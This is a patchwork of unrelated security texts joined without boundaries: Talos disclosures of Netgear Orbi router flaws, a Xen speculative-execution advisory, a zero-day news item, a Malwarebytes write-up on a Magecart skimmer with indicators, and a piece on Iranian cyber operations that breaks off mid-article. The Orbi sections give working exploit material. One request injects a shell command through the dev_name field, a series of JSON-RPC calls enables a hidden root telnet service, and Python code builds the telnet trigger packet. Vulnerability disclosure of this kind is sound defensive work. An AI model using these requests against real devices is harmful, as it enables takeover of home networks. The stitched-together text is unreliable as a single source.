A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

9.1 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

The access control functionality of the Orbi RBR750 allows a user to explicitly add devices (specified by MAC address and a hostname) to allow or block the specfied device when attempting to access the network. However, the dev_name parameter is vulnerable to command injection.

**Exploit Proof of Concept**

    POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
    Host: 10.0.0.1
    Content-Length: 104
    Authorization: Basic YWRtaW46UGFzc3cwcmQ=
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
    Connection: close
    
    action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list
    

On the device itself, we can see this command now being executed.

       root@RBR750:/tmp# ps | grep ping
       21763 root      1336 S    ping 10.0.0.4
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-37337: TALOS-2022-1596 || Cisco Talos Intelligence Group

A cleartext transmission vulnerability exists in the Remote Management functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted man-in-the-middle attack can lead to a disclosure of sensitive information.

**SUMMARY**

A cleartext transmission vulnerability exists in the Remote Management functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted man-in-the-middle attack can lead to a disclosure of sensitive information.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

6.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

**CWE**

CWE-311 - Missing Encryption of Sensitive Data

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

An option exists in the Web Services Management tool to “Always use HTTPS to access the router”. However, if a user browses to http://<router_ip>/ they are prompted for credentials before redirecting to HTTPS. In addition, the credentials must be valid in order for the redirect to proceed. Once redirected to HTTPS, the user is then prompted again for authentication, but this time over HTTPS.

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Christopher McBee and Dave McDaniel of Cisco Talos.

CVE-2022-38458: TALOS-2022-1598 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Satellite RBS750 4.6.8.5

**PRODUCT URLS**

Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.

The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 217
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}
    

This will return a ‘ubus\_rpc\_session’ token needed to start the hidden telnet service:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 829
    Connection: close
    Date: Mon, 11 Jul 2022 19:27:03 GMT
    Server: lighttpd/1.4.45
    
    {"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
    

Once this token is retrieved we simply need to add a parameter called ‘telnet\_enable’ to start the service:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 138
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/status.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
    

**Exploit Proof of Concept**

Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:

    $ telnet 10.0.0.4
    Trying 10.0.0.4...
    Connected to 10.0.0.4.
    Escape character is '^]'.
    
    login: admin
    Password: === IMPORTANT ============================
     Use 'passwd' to set your login password
     this will disable telnet and enable SSH
    ------------------------------------------
    
    
    BusyBox v1.30.1 () built-in shell (ash)
    
         MM           NM                    MMMMMMM          M       M
       $MMMMM        MMMMM                MMMMMMMMMMM      MMM     MMM
      MMMMMMMM     MM MMMMM.              MMMMM:MMMMMM:   MMMM   MMMMM
    MMMM= MMMMMM  MMM   MMMM       MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
    MMMM=  MMMMM MMMM    MM       MMMMM    MMMM    MMMM   MMMMNMMMMM
    MMMM=   MMMM  MMMMM          MMMMM     MMMM    MMMM   MMMMMMMM
    MMMM=   MMMM   MMMMMM       MMMMM      MMMM    MMMM   MMMMMMMMM
    MMMM=   MMMM     MMMMM,    NMMMMMMMM   MMMM    MMMM   MMMMMMMMMMM
    MMMM=   MMMM      MMMMMM   MMMMMMMM    MMMM    MMMM   MMMM  MMMMMM
    MMMM=   MMMM   MM    MMMM    MMMM      MMMM    MMMM   MMMM    MMMM
    MMMM$ ,MMMMM  MMMMM  MMMM    MMM       MMMM   MMMMM   MMMM    MMMM
      MMMMMMM:      MMMMMMM     M         MMMMMMMMMMMM  MMMMMMM MMMMMMM
        MMMMMM       MMMMN     M           MMMMMMMMM      MMMM    MMMM
         MMMM          M                    MMMMMMM        M       M
           M
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
     ---------------------------------------------------------------
    root@RBS750:/# 
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-36429: TALOS-2022-1597 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Previous to recent hardware and software updates, the Netgear Orbi router series had a hidden debug page containing a toggle switch to enable the telnet service on the device http://<router ip>/debug.htm. However, recent updates have removed this switch and seemingly the ability to enable the service at all. While the switch in the GUI no longer functioned/was removed, enabling the service was still possible by sending a specially-crafted trigger packet to UDP port 23 (https://github.com/bkerler/netgear\_telnet). While recent updates have seemingly broken this tool (and the many tools like it), the service does still exist and is still triggerable.

The newer codebase uses a modified version of the Blowfish algorithm, which appears to be similar to older Nintendo DS cartridge protection code. Specifically the crypt_64bit_up/down functions with the constants 0x12, 0x112, 0x212, and 0x312 in the PoC below.

    def crypt_64bit_up(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0, 0x10):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[-2]
        y = y ^ pArray[-1]
        return (x, y)
    
    def crypt_64bit_down(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0x11, 1, -1):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[1]
        y = y ^ pArray[0]
        return (x, y) 
    

To trigger and enable this service, a username, password and MAC address of the target device’s br-lan interface are required.

**Exploit Proof of Concept**

    $ ./enable_telnet_poc.py
    Plaintext payload:
    00000000: 43 38 39 45 34 33 34 44  45 38 37 38 00 00 00 00  C89E434DE878....
    00000010: 61 64 6D 69 6E 00 00 00  00 00 00 00 00 00 00 00  admin...........
    00000020: 50 61 73 73 77 30 72 64  00 00 00 00 00 00 00 00  Passw0rd........
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    Encrypted payload:
    00000000: D0 9C 30 F6 7D 98 82 EE  8F 14 65 9F B9 03 3C 8D  ..0.}.....e...<.
    00000010: D0 56 6C C4 13 EB 29 43  84 4B BB F5 B1 B0 C5 32  .Vl...)C.K.....2
    00000020: 63 CF 65 A2 BA 4F 87 8F  7C 82 89 28 32 95 7C 64  c.e..O..|..(2.|d
    00000030: 53 20 20 62 E2 F9 4B 3D  7C 82 89 28 32 95 7C 64  S  b..K=|..(2.|d
    00000040: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000050: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000060: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000070: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    
    $ telnet 10.0.0.1
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escape character is '^]'.
     === LOGIN ===============================
      Please enter your account and password,
      It's the same with DUT GUI
     ------------------------------------------
    telnet account: admin
    telnet password:
    
    BusyBox v1.30.1 () built-in shell (ash)
    
      .oooooo.             .o8        o8o           .o.       ooooooo  ooooo
     d8P'  `Y8b           "888        `"'          .888.       `8888    d8'
    888      888 oooo d8b  888oooo.  oooo         .8"888.        Y888..8P
    888      888 `888""8P  d88' `88b `888        .8' `888.        `8888'
    888      888  888      888   888  888       .88ooo8888.      .8PY888.
    `88b    d88'  888      888   888  888      .8'     `888.    d8'  `888b
     `Y8bood8P'  d888b     `Y8bod8P' o888o    o88o     o8888o o888o  o88888o
    
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, 10.0.3440.3644)
     ---------------------------------------------------------------
    root@RBR750:/#
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-38452: TALOS-2022-1595 || Cisco Talos Intelligence Group

x86: speculative vulnerability in 32bit SYSCALL path Due to an oversight in the very original Spectre/Meltdown security work (XSA-254), one entrypath performs its speculation-safety actions too late. In some configurations, there is an unprotected RET instruction which can be attacked with a variety of speculative attacks.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory CVE-2022-42331 / XSA-429 version 3 x86: speculative vulnerability in 32bit SYSCALL path UPDATES IN VERSION 3 ==================== Public release. ISSUE DESCRIPTION ================= Due to an oversight in the very original Spectre/Meltdown security work (XSA-254), one entrypath performs its speculation-safety actions too late. In some configurations, there is an unprotected RET instruction which can be attacked with a variety of speculative attacks. IMPACT ====== An attacker might be able to infer the contents of arbitrary host memory, including memory assigned to other guests. VULNERABLE SYSTEMS ================== Xen versions 4.5 through 4.17 are vulnerable. Older versions are not vulnerable. Only x86 CPUs are potentially vulnerable. CPUs of other architectures are not vulnerable. The problematic codepath is only reachable on x86 CPUs which follow AMD's behaviour with respect to SYSCALL instructions from compatibility mode segments. This means that AMD and Hygon CPUs are potentially vulnerable, whereas Intel CPUs are not. Other vendors have not been checked. Only PV guests can leverage the vulnerability. On Xen 4.16 and later, the vulnerability is only present if 32bit PV guest support is compiled in - i.e. CONFIG\_PV32=y. On Xen 4.15 and older, all supported build configurations are vulnerable. The vulnerability is only present when booting on hardware that supports SMEP or SMAP (Supervisor Mode Execution/Access Prevention). This is believed to be some Family 0x16 models, and all later CPUs. MITIGATION ========== Not running untrusted PV guests will avoid the issue. CREDITS ======= This issue was discovered by Andrew Cooper of XenServer. RESOLUTION ========== Applying the appropriate attached patch resolves this issue. Note that patches for released versions are generally prepared to apply to the stable branches, and may not apply cleanly to the most recent release tarball. Downstreams are encouraged to update to the tip of the stable branch before applying these patches. xsa429.patch xen-unstable - Xen 4.16 xsa429-4.15.patch Xen 4.15 - Xen 4.14 $ sha256sum xsa429\* 2d7be90d917c475ab5217e657d2b44f5d8b107d9023dca034fcfb7feab07b2f0 xsa429.meta 36ed36dbfaad9e5df5fa87b9a3d9e9c531f476f97eeb2afe280aa238032a0540 xsa429.patch 7ac3d4182585e5d2d39231f10e7c0c9fcb972c82cf81cb884e95b628187de3a7 xsa429-4.15.patch $ DEPLOYMENT DURING EMBARGO ========================= Deployment of the patches and/or mitigations described above (or others which are substantially similar) is permitted during the embargo, even on public-facing systems with untrusted guest users and administrators. But: Distribution of updated software is prohibited (except to other members of the predisclosure list). Predisclosure list members who wish to deploy significantly different patches and/or mitigations, please contact the Xen Project Security Team. (Note: this during-embargo deployment notice is retained in post-embargo publicly released Xen Project advisories, even though it is then no longer applicable. This is to enable the community to have oversight of the Xen Project Security Team's decisionmaking.) For more information about permissible uses of embargoed information, consult the Xen Project community's agreed Security Policy: http://www.xenproject.org/security-policy.html -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmQZlWMMHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZil4H/2b1DkLLz4RQqAgvaB8+SBeVLPqoZ7QxGLl8QXWT AMjFdy+M5T1OtbrMvEYCZNYhZnGOJgmVagERUvg/yZbPYx28NIHjG4+u90Ot6OId AQPqdrJ0wjEzN/ppNpnu1ALofAGbjsnAypEouGPh12gh5fcpcLQdT0rvpl2ff5f6 Qi4ShtUXhBiduBQcJ0TSneSCf5s7cq1+sMenntenK5Nrsvg7gu51YR45FyKyXdZc raonkGDny9kmDAjdKkywS2Au2763ph9nHbW5TbD17s65AKUDTupzk+QlFPhJLIP+ /gxDoUjKFiD/eY0AABWMAFGGvHFRNvdhTfUd6ImmWhqdEeE= =HxUJ -----END PGP SIGNATURE-----

CVE-2022-42331

As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple.
While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage.
The

Cyber Threat Intel / Vulnerability

As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple.

While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage.

The findings come from threat intelligence firm Mandiant, which noted that desktop operating systems (19), web browsers (11), IT and network management products (10), and mobile operating systems (six) accounted for the most exploited product types.

Of the 55 zero-day bugs, 13 are estimated to have been abused by cyber espionage groups, with four others exploited by financially motivated threat actors for ransomware-related operations. Commercial spyware vendors were linked to the exploitation of three zero-days.

Among state-sponsored groups, those attributed to China have emerged as the most prolific, exploiting seven zero-days – CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328 – during the year.

Much of the exploitation has focused on vulnerabilities in edge network devices such as firewalls for obtaining initial access. Various China-nexus clusters have also been spotted leveraging a flaw in Microsoft Diagnostics Tool (aka Follina) as part of disparate campaigns.

"Multiple separate campaigns may indicate that the zero-day was distributed to multiple suspected Chinese espionage clusters via a digital quartermaster," Mandiant said, adding it points to the "existence of a shared development and logistics infrastructure and possibly a centralized coordinating entity."

North Korean and Russian threat actors, on the other hand, have been linked to the exploitation of two zero-days each. This includes CVE-2022-0609, CVE-2022-41128, CVE-2022-30190, and CVE-2023-23397.

The disclosure comes as threat actors are also getting better at turning newly disclosed vulnerabilities into powerful exploits for breaching a wide range of targets across the world.

"While the discovery of zero-day vulnerabilities is a resource-intensive endeavor and successful exploitation is not guaranteed, the total number of vulnerabilities disclosed and exploited has continued to grow, the types of targeted software, including Internet of Things (IoT) devices and cloud solutions, continue to evolve, and the variety of actors exploiting them has expanded," Mandiant said.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

The Mandiant report also follows a warning from Microsoft's Digital Threat Analysis Center about Russia's persistent kinetic and cyber targeting as the war in Ukraine continues into the second year.

The tech giant said since January 2023 it has observed "Russian cyber threat activity adjusting to boost destructive and intelligence gathering capacity on Ukraine and its partners' civilian and military assets."

It further warned of a possible "renewed destructive campaign" mounted by the nation-state group known as Sandworm (aka Iridium) on organizations located in Ukraine and elsewhere.

What's more, Moscow-backed hackers have deployed at least two ransomware and nine wiper families against over 100 Ukrainian entities. No less than 17 European countries have been targeted in espionage campaigns between January and mid-February 2023, and 74 countries have been targeted since the start of the war.

Other key traits associated with Russian threat activity include the use of ransomware as weapons of cyber sabotage, gaining initial access through diverse methods, and leveraging real and pseudo hacktivist groups to expand the reach of Moscow's cyber presence.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

From Ransomware to Cyber Espionage: 55 Zero-Day Vulnerabilities Weaponized in 2022

Categories: Threat Intelligence
Tags: magecart

Tags: skimmer

Tags: obfuscation

Tags: hunter

Tags: credit card

Tags: magento

The threat actor behind this operation is using an open-source JavaScript obfuscator to hide its code.



(Read more...)




The post A look at a Magecart skimmer using the Hunter obfuscator appeared first on Malwarebytes Labs.

Threat actors are notorious for trying to hide their code in various ways, from binary packers to obfuscators. On their own, these tools are not always malicious as they can also be be used by companies or individuals who wish to keep their work safe from piracy, but overall they tend to be largely abused.

In the case of credit card skimmers in client-side attacks, obfuscators are a common occurrence as they can make code identification more difficult. Defenders typically have the choice to either rely on the browser's debugger and step through the code, or can statically try to reverse it. The latter tends to be quite time consuming, but the former can often problematic if the malware author adds anti-debugging routines.

Today, we look at a Magecart skimmer that uses Hunter, a PHP Javascript obfuscator. During our investigation, we were able to discover a number of domains all part of the same infrastructure with custom skimmers for several Magento stores.

**Initial injection on e-commerce sites**

The attack relies on 2 steps: the first one is code injected inside the website's source that calls out a remote URL. That URL in turn, loads the skimmer within the payment checkout process.

We notice a large blurb of code that contains some static elements and others that are uniquely generated. The '_eval_' portion of the code is a clear giveaway that the random looking string is being processed dynamically to return some instructions.

The function (h,u,n,t,e,r) helps us to identify that this obfuscator is called Hunter and available on GitHub. To decode the obfuscated string, we can simply write out the content of _eval_ and we obtain a single line of JavaScript pointing to a URL.

This URL contains code that has been obfuscated with Hunter once again. This time, once we deobfuscate it, we see what appears to be HTML code with forms referring to credit card fields. This is the actual skimmer.

**Skimmer at checkout page**

When a victim who's shopping at a compromised online store goes to check out, there will be additional fields injected in the contact form that aren't normally there. Below is the legitimate checkout page of a store without the skimmer being loaded:

We can see that the payment process is on the bottom right hand side. In contrast, this is what the same page looks like when the skimmer is loaded:

Additional fields were inserted between the shopper's email address and name. In this case, the threat actor didn't do a very good job because the fields are in English while the rest is in Spanish.

The credit card data to be stolen is encoded, then stored inside a cookie and subsequently exfiltrated via a POST request.

******Infrastructure**

The skimmer domains registered with Porkbun all appear to be hosted on the same server at 193.201.9.116 (ASN49505):

We can get any of the currently still resolving domains to show their own version of the skimmer code by crafting a GET request with the proper referer:

The Hunter obfuscator is handy but quite easy to reverse and as such provides minimal stealth capabilities. Based on the skimmer code, this is not a very sophisticated attack probably limited to less than a hundred stores. However, this was the first time we encountered a Magecart skimmer using this kind of obfuscation and most endpoint security products are not detecting the client-side JavaScript.

Malwarebytes customers are shielded against this campaign via our web protection in End Protection (EP), Endpoint Detection and Response (EDR) and Malwarebytes Premium.

**Indicators of Compromise**

**Host:**

193.201.9.116

**Skimmer domains:**

1537la\[.\]buzz 

1537li\[.\]buzz 

1537lx\[.\]buzz 

1568la\[.\]buzz 

1568li\[.\]buzz 

1568lx\[.\]buzz 

1599la\[.\]buzz 

1599li\[.\]buzz 

1599lx\[.\]buzz 

1599lz\[.\]buzz 

appcloud1\[.\]buzz 

appcloud19\[.\]buzz 

appcloud2\[.\]buzz 

appcloud20\[.\]buzz 

appcloud3\[.\]buzz 

appcloud5\[.\]buzz 

araboxtv\[.\]sbs 

blindsmax\[.\]sbs 

bubapeq\[.\]quest 

dev-extension\[.\]cloud 

dev-extension\[.\]one 

dev-extension\[.\]us 

hedeya\[.\]sbs

hedeya\[.\]sbs 

inspirefitness\[.\]sbs 

motherearthlabs\[.\]sbs 

nasaservers\[.\]sbs 

newarriwal\[.\]quest 

paramountchemicals\[.\]sbs 

peqart\[.\]sbs 

remediadigital\[.\]sbs 

roboshop\[.\]sbs 

schmerzfrei-shop\[.\]sbs 

swsgswsg\[.\]sbs 

thecornerstoreau\[.\]sbs 

ultracoolfl\[.\]sbs

A look at a Magecart skimmer using the Hunter obfuscator

Amid ongoing protests, the Iranian regime has lost control of its image, pushing it to employ increasingly drastic tactics where everyone loses.

In the early hours of January 5, a popular anonymous Iranian dissident account called Jupiter announced on Twitter that his friends had killed Abolqasem Salavati, a maligned magistrate nicknamed the “Judge of Death.” The tweet went viral, and thousands of jubilant people poured into the account’s Twitter Space to thank them for assassinating the man responsible for sentencing hundreds of political prisoners to die.

Soon, however, a few attendees voiced doubts over the veracity of the claim. They were cursed at and kicked out of the room, as the host insisted, “Tonight is about celebration!” while repeatedly encouraging viewers to make the Space go viral. The next day, activists on the ground and Iranian media confirmed that Salavati was, in fact, alive. Several experts suspect Jupiter to have been an Islamic Republic of Iran cyber operation aimed at distracting people, while the Iranian government executed two protesters the same night as the Twitter Space.

Within its borders, the Iranian regime controls its population through one of the world’s toughest internet filtering systems, physical crackdowns, and mass arrests carried out with impunity. However, the IRI is vulnerable beyond its physical and virtual borders, as the regime struggles to contain the discourse and silence dissidents. To combat opposition narratives in the West and among VPN-armed domestic activists online, the IRI cyber army deploys multifaceted, devious, and sometimes clumsy tactics. With the ongoing political unrest in Iran, old cyber tactics have been ramped up, and new tricks that aim to distract, discredit, distort, and sow distrust have come to the fore as the regime finds itself in a critical moment.

Desperate Times, Desperate Measures

Among the tactics used by the IRI’s cyber agents—known colloquially as Cyberi—is old-school hacking. The Iran-linked hacker group Charming Kitten gained notoriety in 2020 for its spear-phishing attempts on journalists, scholars, and policy experts in the West. The group was recognized by its signature strategy of pretending to be reporters or researchers and feigning interest in their targets’ work as a pretext for setting up interview requests embedded with a spear-phishing link. Recent reports from the UK government’s National Cyber Security Center and security firm Mandiant found that such spear-phishing activities cyber groups TA453 and APT42, which are affiliated with the Iranian Revolutionary Guard Corps, have been increasingly prevalent. Last month, the popular anti-regime account RKOT claimed to have received an interview request geolocated to an IRGC department in Shiraz from an individual purporting to be a journalist from _The New York Times_. 

According to Amin Sabeti, founder of CERTFA, a cybersecurity collective specializing in uncovering state-backed Iranian cyber activities, these operations have shifted their methods over the past few months, since most targets of interest are aware of the threat and have learned to protect themselves from spear-phishing. Instead, Sabeti says, they now use a “domino effect” strategy by taking aim at low-profile targets, whose credentials they harvest in order to build trust and gain access to higher-profile targets in their network. Early this month, for example, the Iranian Canadian human rights activist Nazanin Afshin Jam said that she received a spear-phishing link from a trusted colleague who had been hacked.

“Right now, they go after everyone who they are interested in, in terms of this revolution, especially people who are working in nonprofits,” Sabeti says. 

Notably, some of these state actors establish credibility and trust over time by masking themselves as anti-regime voices and ardent supporters of the protest movement, or by building relationships with targets. One account by the name of Sara Shokouhi was created in October 2022 and claimed to be a Middle East scholar. The account spent months boosting opposition voices and writing heartfelt tributes to protesters before finally being outed by Iran experts as a state-sponsored phishing operation.

The ongoing protest movement in Iran has also given rise to more intense disinformation campaigns on social media. It is difficult to attribute the activities of anonymous accounts to the Iranian regime with certainty, since many regular Iranians are anonymous for security reasons. Occasionally, however, sloppiness—failing to delete old tweets or accidentally posting pro-regime messages on opposition sock puppet accounts—have revealed their likely affiliation with IRI intelligence.

The fast-paced, chaotic environment during protests within Iran has been ripe for disinformation and information pollution, making it too overwhelming to verify every claim even for researchers, says Simin Kargar, a nonresident fellow at the Atlantic Council’s Digital Forensic Research Lab. 

According to Kargar, the prospects of IRI disinformation operations shifting the narrative in the regime’s favor are slim. However, its cyber activity has had the effect of sowing doubt, where no one is sure what is true and who is trustworthy.

“Iranian information operations haven’t been successful in terms of the region and the type of attention they tend to draw,” she says. “But if their sole accomplishment in this situation is to make everyone doubt whatever is said, even by credible people, that's a big accomplishment for them. It's about creating a climate of fear and intimidation more than making people believe them. Because at this point of 44 years of the Islamic Republic, no one believes what they say.”

No One to Trust

Although widespread vigilance against IRI state actors has made the public less susceptible to propaganda tactics, it has simultaneously created an environment of distrust, where anybody is potentially a regime goon.

